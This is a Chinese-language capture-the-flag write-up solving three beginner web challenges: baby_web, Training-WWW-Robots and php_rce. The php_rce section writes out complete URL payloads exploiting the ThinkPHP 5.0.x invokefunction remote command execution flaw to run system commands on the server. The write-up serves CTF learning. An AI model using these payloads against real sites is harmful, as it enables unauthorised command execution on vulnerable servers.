baby_web
- 点击题目链接,可以看到一个
1.php
的页面。 - 题目要求是查看初始页面,在
url
后面添加index.php
【单一入口的应用程序就是说用一个文件处理所有的HTTP请求,例如不管是列表页还是文章页,都是从浏览器访问index.php
文件,这个文件就是这个应用程序的单一入口。由于所有的http
请求都由index.php
接收,所以可以进行集中的安全性检查,如果不是单一入口,那么开发者就必须记得在每一个文件的开始加上安全性检查代码。工作都被集中到了index.php
来完成,可以减轻我们维护其他功能代码的难度,所有http
请求都是针对index.php
,】,打开开发者工具一栏中的网络,发现url
中响应得到的依然为1.php
。 - 查看
index.php
一栏的消息头响应,可以得到flag
。
Training-WWW-Robots
- 由题目可以看出本题的原理是
robots.txt
协议【robots.txt
协议是在Web
站点的根目录下设置一个robots.tx
t文件,规定站点上的哪些区域或者哪些页面是限制搜索的。搜索程序将参考该文件,决定站点中的哪些区域是不允许搜索的,并在接下来的搜索过程中跳过这些区域。】 - 点击题目链接
- 在
url
后面添加/robots.txt
,Disallow
是拒绝语句,定义了搜索程序不允许访问的Web站点路径,拒绝语句只针对路径进行设置,不针对具体的文件。
- 我们可以猜测到flag在fl0g.php中,修改url并访问,响应得到flag。
php_rce
- 点击题目链接,可以看到题目为
php
远程命令执行的缩写。
- 这是一个
thinkphp
框架,我们可以访问不存在的模块,得到php
的版本号 thinkphp
版本为5.0.20
,正好是去年爆出的thinkphp rce
漏洞的版本。ThinkPHP 5.x远程命令执行漏洞分析与复现- 在url后面添加
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
来查找flag。 - 在url后面重现添加
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
来查看flag。